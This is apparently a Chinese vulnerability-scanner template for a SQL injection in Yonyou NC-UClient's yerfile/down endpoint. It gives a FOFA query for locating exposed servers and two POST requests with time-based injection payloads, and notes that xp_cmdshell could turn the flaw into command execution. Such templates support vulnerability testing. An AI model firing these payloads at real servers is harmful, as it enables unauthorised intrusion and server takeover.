product: 用友NC-UClient
vName: 用友NC-UClient yerfile-down接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友NC portal/pt/yerfile/down 接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC"
protocol: http
link: https://cn-sec.com/archives/3473222.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /portal/pt/yerfile/down/bill?pageId=login
      data: id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)--
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: '>='
            num: 5
  - exp:
      method: post
      follow: false
      path: /portal/pt/yerfile/down/bill?pageId=login
      data: id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),0)--
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: <=
            num: 3